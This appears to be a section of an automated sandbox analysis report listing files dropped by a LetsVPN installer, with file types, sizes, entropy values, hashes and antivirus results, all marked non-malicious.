                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:c4burBkDijpS3+n1Sr5ePVM761+fAwb0A/z:ciikDiw3+1af761+rY+
                                                                                                                                                                                                  MD5:D80339E7A59BA5938DDA47AB253C3F5B
                                                                                                                                                                                                  SHA1:9AF9D1AB6EB6E73ED0E42EC45D76C29BDA7FA5C8
                                                                                                                                                                                                  SHA-256:B649549A1E2A8CD22A14F6202AD80AB30119937CC1D69B2FBDD3D9A1FB37A13E
                                                                                                                                                                                                  SHA-512:126FC5A50D36D7734D2BBCD63703D65720EB7DC0548C8275771EDED722A6F3F26787845F86A2C9D76364E1DEA204750E41140DB5EF714D2A772CCF236CF1267A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):146464
                                                                                                                                                                                                  Entropy (8bit):5.810766544493159
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LSiitDW10Oug94BeCCepM1STU/xnW+W6jfM0amyw0VzGLC1grekKtk0do/9o8afk:uiNang9meCCepM1ST+xnW+W6jfM0amyw
                                                                                                                                                                                                  MD5:CE7AC0EA44FF270ADD7888FE3952A592
                                                                                                                                                                                                  SHA1:9B2193D472191A303B37CD2F0CBA5493E367BE77
                                                                                                                                                                                                  SHA-256:24BD1E22D0F674442D607C0552AC2C3F55EBCE8B3D81D6BD73D244AA2133D5C3
                                                                                                                                                                                                  SHA-512:D4DC9509200BBD00CE2480488C8E4A19CB8DCDEBF7F1B33BBF0A45B1441C2AE3F33EC8CFA374892632E1A8BEB8A7318766750678E97D877295995837DC5883BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31776
                                                                                                                                                                                                  Entropy (8bit):6.576538838641731
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:3LNoCdzhFQj/hJTBbGXZDDcULH4JVrwRSgBucQgJa5/Zi/dUDyqz1POMrhq3b2KY:3LqCHmTxGXZDDcULH4JVrwRSgBuvgJad
                                                                                                                                                                                                  MD5:C1994BBFAF6A739406029ED8676659D0
                                                                                                                                                                                                  SHA1:31530C18F2346BCCCE9ED1C78C574CD984C1F6EF
                                                                                                                                                                                                  SHA-256:6DD308156CF036D9972BE22FD6A5BA4767A5C22C9C7DA452F260CE9E0C2A083A
                                                                                                                                                                                                  SHA-512:2FB3FAC797357993D88C282C520D26C2EEB25BE85D82CCA092283E17B47C174DA842AACA8C128BB7C055E57A8020A221EA0EEA9BF340129E8B5ACC19D43E4938
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34336
                                                                                                                                                                                                  Entropy (8bit):6.562572630329577
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:knD8wecsVygSvqa8ZDPLryER0SO4JVrTYIWUpDkS/Ka5/Bi/W7v4F4zfKwaq3b2U:k7eN4vqa8ZDPLryER0SO4JVrTYIWUpDF
                                                                                                                                                                                                  MD5:C0A30AA26D512873D0B9FEA741870AF1
                                                                                                                                                                                                  SHA1:FD9599E524B3AA48198F0F4D9DF676766ED02F61
                                                                                                                                                                                                  SHA-256:B2AEFFBC045D8B20D4F3F2EC35A16A4F68A1034392DCC22DECAEE814BB600C20
                                                                                                                                                                                                  SHA-512:EBC71E2036F9C84F6214BC4418715C2A7A2B17D00AE7E91FDC5A65BFB26AC21E814362B62D249F0B5BD85FBF4E834204E5FCF5EBD6BFC85F8B6B86D7C6B2BFE6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.951071216277355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:SN9VWhX3W+hqWOHlLf2KQcvBZ9sGQtS+ShjmM6IGBkSXC:SGbq3b2KZBZZOS+ST6nk1
                                                                                                                                                                                                  MD5:45A59E4D60F6970DCA66AB643AA8C8CD
                                                                                                                                                                                                  SHA1:2A25F0B075E9B39E104B2741A389C820ABE74F70
                                                                                                                                                                                                  SHA-256:FD532F01EC78C8E93AAB9C9349A5106966B3065F42E39989FEC7EB5F15B3293C
                                                                                                                                                                                                  SHA-512:72009C298FEC97ED2142B37D5A5FDFCED65DAAF43FBB45754035CCFD62D0D0F0DB465050B747CAF86223691E49544471FD6DCAB6604D96CF47390186E69D32BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.7753295378501
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kSk7xWUHIx0S3WF7rWthqWOHlLf2KQcvBZ9fGS+ShjmM6IGBkSJ6Z:k/0UHU0SOaq3b2KZBZMS+ST6nkZZ
                                                                                                                                                                                                  MD5:2D864C6E9E03F41D091BDDDD392B38DF
                                                                                                                                                                                                  SHA1:FA367DA623EAA3A114DB0EC35599E63E53A068B3
                                                                                                                                                                                                  SHA-256:D7EA78A691416DCB9BC10A615CA41B13A5F2698DE414E2C80867B6F20B832508
                                                                                                                                                                                                  SHA-512:EE2BCD1D40E111DA22F76331CA1BC2FA48E913DBC2A99CF4DFC28883556B86C7EDB903AFDE8524748804572F6EB6043223A1EB99862F6061E94ECF4CC5A373F0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29216
                                                                                                                                                                                                  Entropy (8bit):6.47574588426455
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:N4QVrxViR9mlxdgq3b2KZBZ6aS+ST6nke:FdxViR9mlxdT3qKsa/mQ
                                                                                                                                                                                                  MD5:C969E3ED73E69BE104174C989080CC51
                                                                                                                                                                                                  SHA1:9CB185BE071F23406E7B961E0996EDC71A61834E
                                                                                                                                                                                                  SHA-256:4AB704100BA1E5248B8E05934AD9597C0F6DA0306E4AE37A8F2F8CFAA48B1921
                                                                                                                                                                                                  SHA-512:8F1DF0B377FC098CD909EE3C28E5AABF441954919AC11AD591E89C5FF2A0EA23637C8537A3528429A9C6DBE376E1A13A68D910AC600486EF6ABAF32D179C4248
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.675783274544051
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:tdIaf4rbDyIb/KcWCNRWr7JW/yhqWOHlLf2KQcvBZ9B/MkS+ShjmM6IGBkS5:t+THDHbs6GWGq3b2KZBZokS+ST6nkS
                                                                                                                                                                                                  MD5:D6E4174C9B4EF259C9CB5F37B509F842
                                                                                                                                                                                                  SHA1:2061F234A0004F4A0F17CB41DF611497943CEC05
                                                                                                                                                                                                  SHA-256:579FC3FE3BF74F2F48A2416DE7EE7BF87BF7FBF8749EEBF4D170D51A5F31BD79
                                                                                                                                                                                                  SHA-512:E97DCB302BC88D81A060C5D18024528DA4B3BA696EA082E2C3FFF4298B23A72C2317F51D3A1A073A0878CA293D3D1D8EF2DC17CAF18C60DCA3C0365658E6B81C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54816
                                                                                                                                                                                                  Entropy (8bit):6.292347937187533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Mr59g98C87KHeBUbwgKirbdwMRTzAt9l63qKk/mI8:Mr5HC87rUbwgKirJw1Dl6g/B8
                                                                                                                                                                                                  MD5:33CA4672410B18BB3C83114E36A6B5DC
                                                                                                                                                                                                  SHA1:E2BFF454FFA6C97C9BF5B343708FCD844404BF32
                                                                                                                                                                                                  SHA-256:24352BC45172AADBDC732016CBB57705630CE2B87F50EC915F28DFDE8172B739
                                                                                                                                                                                                  SHA-512:C5C52435F90B9598B901DA27B3E3B95C8E7D2256C8F7944CEAFAE49BD34C3169B16DFFCEEE5056F31AC70272EA4458F870D5D601364E9D7B663BEE631D80E054
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):100896
                                                                                                                                                                                                  Entropy (8bit):6.424195990637689
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:BU2qJ+RazRt/Kc4oJiOxFR4NdJF0/RfhF46HAoYKHgPzpS6w7fa1C9rD3qKi/mt:K2MRtrfrR+Pe/xAiAzpQ7y1C9rDW/W
                                                                                                                                                                                                  MD5:1617B96006C9490C73D574F69FCC5B57
                                                                                                                                                                                                  SHA1:21704ABDD45998D58F106C511C926C697C42320D
                                                                                                                                                                                                  SHA-256:828BA79ADE3358961DD11B11175A9F913E163D711B5C12749D109830FBAF366E
                                                                                                                                                                                                  SHA-512:EE6FF1F39C6E3DFB6F9AD7E9495D5A4C6A46E15D961FB8DFEFC09EAB0FFA6276287B3ABB27D2E08F2271605F365BF99EF00550345F0CFA8E516435E3E8F5CEA2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39456
                                                                                                                                                                                                  Entropy (8bit):6.494502675405848
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:A+meiCyrXOwS8uRssveum1peFLHFBbOBq3b2KZBZ25S+ST6nkj:ryrewFassveuPbBC03qKc/m5
                                                                                                                                                                                                  MD5:EC80554D9363197EBFCE80B8AD93E8BB
                                                                                                                                                                                                  SHA1:661EFC6DBD4F950076F23B41789C38F106953DEA
                                                                                                                                                                                                  SHA-256:CF84E892C469AC8931B7C0DBA290DD35D52340BBEEE669BCC91E9AF638D1AD85
                                                                                                                                                                                                  SHA-512:C2C76C4C5B2474546DDF4F8505E3094E6C2E116FE77A1E1B49BEC7E43643773A75B8262CF8579801F2656C8ADACBD27C33B76B7ABE89ED4614AB0B0143630FFA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):356896
                                                                                                                                                                                                  Entropy (8bit):6.249285614378823
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:VFzzF5VOCxfiKKhsw4NiL0XRzx9WoCklyusCLU:vdfiKI4RzWSyu8
                                                                                                                                                                                                  MD5:C993931B4C49CBB08BE01F5948222C21
                                                                                                                                                                                                  SHA1:AFAFFE49A7709FB0DF1BEB36791A8800153593DB
                                                                                                                                                                                                  SHA-256:0FD8A36F7404D57DC3A3497E42E9ADE20268CDABAE2C481B134FF51555791A0A
                                                                                                                                                                                                  SHA-512:B367F098169A84F29643216E8182277884DB829C1F404BBA4BBC10290BA9FB88B1CC99D0AEC3DEBCF626445E20B8A04C3BF6EC520AB8866C4F417EA3E6F2C489
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):711712
                                                                                                                                                                                                  Entropy (8bit):5.966409790111297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:ZBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUO:ZBjk38WuBcAbwoA/BkjSHXP36RMGf
                                                                                                                                                                                                  MD5:3B3F8E087FC13A4B7BC9CF7DBBA4ED9B
                                                                                                                                                                                                  SHA1:321E0D0C5C275F2F57AF78BC465535A923D2427C
                                                                                                                                                                                                  SHA-256:AE71F96B5316A5B8EFF90F2DA4C9B55C57FB6A74193F380DEB38E49FE1010DDE
                                                                                                                                                                                                  SHA-512:F823D1460EB52FD039C248E6353587ADB2B78CA9EF988AA9EC7402C428FC3F178D099D5ECD106FDD9E2E051D87DB4A799CD3DE51C402E5C79E5014E6C8C6A6B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):521760
                                                                                                                                                                                                  Entropy (8bit):6.048533534397053
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:rRKflaWVRA6+LX9c1t3HpbOmhYIeDUQjcaPlq1fQx7NqEaElDp3sL2blV/VyUd93:rRt6+A1pbOsBQAa4f0pWSbb+1ikY
                                                                                                                                                                                                  MD5:F5058D921BF63CBA6CCC215365907B8B
                                                                                                                                                                                                  SHA1:F2085212F559708D955EA7A11D59C974FFA70797
                                                                                                                                                                                                  SHA-256:FF54E93669169BB320F3C9F086EC1E39C9EB26D582D63C1EEF77E5CC8A2801B5
                                                                                                                                                                                                  SHA-512:D85672DD7AD98999B3970190C8DCAF879E2DB1B19762B40712DD125931107F2D2A81911C96F2A01F999BBEE9F68F5EF2C5B7827F4B8B0E365C6B2FD5728B3ADC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54304
                                                                                                                                                                                                  Entropy (8bit):6.3200343699892345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:e2xghQUndJrmbnJAM6LjB4Mz5k+/FdS0/MuLs/09P2vq3b2KZBZV5SS+ST6nkKe:eGghQaJiFAMAhH/Dw/09Oi3qKVS/mQe
                                                                                                                                                                                                  MD5:FFECD2746B52EC4505805F28242F2369
                                                                                                                                                                                                  SHA1:1DBBA0503D5DC2E24EE7508850911AD1B973AF2B
                                                                                                                                                                                                  SHA-256:054AE39C180EA555CA0834E5C29CFC3F4F3BA034B4EC7E92554BE2109EE29E1B
                                                                                                                                                                                                  SHA-512:C56AD991F652F37C0257B5BE39B88B112ED26BC4EBBC2D3B1E431478A5366A98CB9EA6E641B8D84449DDADB1644538CBCE8FFE789E8AB8E32EF3350BC26C1B17
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):104992
                                                                                                                                                                                                  Entropy (8bit):6.223980748676277
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:ddAKzGN0ifSJxFlm+FpoHloqUIdmJlllf07gllfUzb1kUyN1e/rWhsCMbdynBH3v:dbcl5mJlllf07gllfUzb6W/+b+OHb/b
                                                                                                                                                                                                  MD5:0EA18CFEE679D16BBF6D44C5A7F2ED8F
                                                                                                                                                                                                  SHA1:2C657D4709892B98D5796E644B2F13B568154C7B
                                                                                                                                                                                                  SHA-256:EB5B85284F7C26A7DE75F896CB95A3730253B0D64C1C4A415B10060F2C60CEAE
                                                                                                                                                                                                  SHA-512:A053B405BEE5754E3F0111AAF5CB6866F4D4467B52259D775E61DDC4EEF8A884CD54F3E207BFCC4DA4F548CE25FBFF161080F08604958ECEC3D8CA413E12869B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):49184
                                                                                                                                                                                                  Entropy (8bit):6.266059158176653
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:NqRdL3e5rHMgWVTnyac4oeZrZ3W3qKZy/mb:kdLTtrZ3Wly/8
                                                                                                                                                                                                  MD5:74F34DD4A8A4B1F44B805FDF77CE0C68
                                                                                                                                                                                                  SHA1:E4241F0226EDB1EE78EBCD96049187BFC78E2EFA
                                                                                                                                                                                                  SHA-256:80CE7E9D4F09F73DEC13A550DC31E0EFFA79DD5BA07479954D6CDEBD3B6FD6AA
                                                                                                                                                                                                  SHA-512:A5A0B04A95409A9A04B2DE72F80EC410D5AC26AC46832E5DBE1F8C7A04EC7AD56915A387F3D33E4A3CA014327A1FDEDEAE1958AAF8AE8020CCB3830F68516341
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.623339844778744
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:A0w2j7R3d4Q5ENmiL31SAAh1OSxJJssUJIJd4l4Trq3b2KZBZ8wS+ST6nkic3:VLAAh1OSxJJssUJIJal4T23qK5/ml
                                                                                                                                                                                                  MD5:E9BD7AFF9F7F4CE19A15A417937A179B
                                                                                                                                                                                                  SHA1:5189A5770C94648914EC9A44C2C76327291D04B0
                                                                                                                                                                                                  SHA-256:E95310BCE625924484DBD4165C7C0552F01BC6BC0CC6C03A65FB4C40E78D8A09
                                                                                                                                                                                                  SHA-512:D8B21999D1BE9B314962EB14FD37A2CD90661BAFD7974F8B5A25524101CF606C9A72B7BDF59004FD8D5B210CED0F1D130300374AB288ABF38CB95F9F68DCE2E1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.876326631146695
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:d6x4ushqWOHlLf2KQcvBZ9RQa/S+ShjmM6IGBkSZL:dEkq3b2KZBZdS+ST6nkwL
                                                                                                                                                                                                  MD5:C293FE3E2A6D35F139E4992D2E92CB90
                                                                                                                                                                                                  SHA1:65207323C9494A1A07677FCD8444E3A32A8D4D79
                                                                                                                                                                                                  SHA-256:2223DB72D86A4409E1960FFA326DD54FA652EE6F9AFCAA1B2E162E637CAF6228
                                                                                                                                                                                                  SHA-512:ED363E16C85CAF716BBF206D2A487ABEA22FE63CC688CDAE9DAB25B4DB21884FF06196659E5D51B29A351DEF35C4EB24937765B685DDCBD1D5A8FE2DFA1D2BA7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):58400
                                                                                                                                                                                                  Entropy (8bit):6.315564723596698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:O0GhwEvUmz5IR5tUe9CiXmEkzKeGIsNif11gNsNj8cIjqabZq3b2KZBZwS+ST6nD:MlIR56kCckz2DhiNIchab83qKu/mv8
                                                                                                                                                                                                  MD5:24E728F20D4174E87326141D124D6EEB
                                                                                                                                                                                                  SHA1:65CF7259921B5AAB0CB2CC0BA21A5FE69641C200
                                                                                                                                                                                                  SHA-256:D2D177DDB348675BF28E24C1D5F8925E3BD96AF5365F7E43EACA425F831CAA8C
                                                                                                                                                                                                  SHA-512:6D8B9758AB349AEF0BDAFC645193D50E34B83876BE04A71B96C8D2FEA55FEE2F5E1F243ACBD83AE7A452D7B5A3919E3A9ED416264B188D95B852610604F7919C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.748166697087464
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:daX0gijditBKMBRBHsEQ5hqWOHlLf2KQcvBZ9EpS+ShjmM6IGBkSQ:dakVRiBB83q3b2KZBZIS+ST6nkb
                                                                                                                                                                                                  MD5:08602BC21315B25E97D7E96D8FC2387F
                                                                                                                                                                                                  SHA1:84C18D3E3022FC445F15F4D589A9B9EF64B4CD6B
                                                                                                                                                                                                  SHA-256:48E07F638344EADF87BC216512464EEB05FD5359292F46ADB8F3F8B801A052FB
                                                                                                                                                                                                  SHA-512:7EDC2C8228D54C83D668D5EC9CE525976D9CC4590D7E53C3BC029AE92158A33AEC725C3A5221E5EFBFA3874F3F79918B02F48AB2BD2660B97B24C29B96F88787
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):68640
                                                                                                                                                                                                  Entropy (8bit):6.075654477750361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Q2UTGlel80eXSfnUnM6sbwXN083qK/D/mT:hlel80eXcU+8n/U
                                                                                                                                                                                                  MD5:C7D493A5DCE0B2C4ECD8EAAB05FEA36D
                                                                                                                                                                                                  SHA1:E139EEC48C6927936E54F4D1F97699448A7E0692
                                                                                                                                                                                                  SHA-256:745A04AFCCC281E483C15F2677AA0FF5D25194C624C293DA9513B0361E6DF50B
                                                                                                                                                                                                  SHA-512:42D8CD32B54AEBCB811496448632F75F2C1BB339536D106B9A809D076CFBD9BFF2DF908BC49E57329BC66099C9975EDE27BEDDE03574F26B2DC576FC0BC6A9EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):110112
                                                                                                                                                                                                  Entropy (8bit):6.152337090409948
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:Yc6dvOJgPj92wqhe2CfvegBPLl86bqagz/i:MKYZTeu
                                                                                                                                                                                                  MD5:A350BD4DA0FE0F225C2EE57A7ADC974C
                                                                                                                                                                                                  SHA1:11B3FCD8D9E2667170845B25CBBFCEB9A5E6ADAC
                                                                                                                                                                                                  SHA-256:D498B2869289EC7D1D5F803B1ED303254F84F9CD0BFCEE98CCA4C903CCB46D42
                                                                                                                                                                                                  SHA-512:6055BF4F094DCFD0554EF4DF25BA774B0FC1A72C7CF045718E25A28C9D3EA10D198AA8FB478E332BB73A96E1245841B4F3A35A49C2FDA555ABB11F607EBA84A1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):465952
                                                                                                                                                                                                  Entropy (8bit):6.223512663085733
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:VcGv7iCPwqEYosfdBtmXaxWoXY06nQk2zLRC+oRZkR4CDy2sqIT0czXDU:x+CoCoCBtmXWnL6nd2ZiUR4WylT0qA
                                                                                                                                                                                                  MD5:944E14779C3757DCB53332A71F2E5ADD
